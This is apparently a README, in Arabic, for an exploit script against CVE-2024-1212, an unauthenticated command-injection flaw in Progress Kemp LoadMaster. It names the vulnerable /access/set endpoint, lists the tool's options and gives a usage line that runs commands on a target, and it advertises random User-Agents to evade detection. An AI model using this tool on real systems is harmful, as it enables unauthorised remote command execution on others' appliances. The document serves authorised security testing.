
استغلال تنفيذ الأوامر عن بُعد دون مصادقة لـ Progress Kemp LoadMaster CVE-2024-1212. يدعم اعتراض الوكيل وتسجيل المخرجات لاختبار الأمان المصرح به.
هذا سكريبت استغلال لـ CVE-2024-1212، وهي ثغرة حقن أوامر بدون مصادقة في Progress Kemp LoadMaster.
CVE-2024-1212 يؤثر على Progress Kemp LoadMaster، مما يسمح للمهاجمين غير المصادق عليهم بتنفيذ أوامر عشوائية على النظام عبر طلب HTTP مخصص إلى نقطة النهاية /access/set.
User-Agent عشوائية لتجنب الكشف الأساسي-p)-o)python3 cve_2024_1212_exploit.py -u <TARGET_URL> -c <COMMAND>
| الوسيطة | الوصف |
|---|---|
-u, --url | URL الأساسي للهدف (مثل http://192.168.1.1) [مطلوب] |
-c, --command | الأمر المطلوب تنفيذه (الافتراضي: id) |
-p, --proxy | URL الوكيل (مثل http://127.0.0.1:8080) لاعتراض حركة المرور |
-o, --output | حفظ المخرجات في ملف (مثل result.txt) |
python3 cve_2024_1212_exploit.py -u http://192.168.100.1 -c "uname -a" -p http://127.0.0.1:8080 -o output.txt
تم توفير هذا السكريبت لأغراض التعليم واختبار الأمان المصرح به فقط.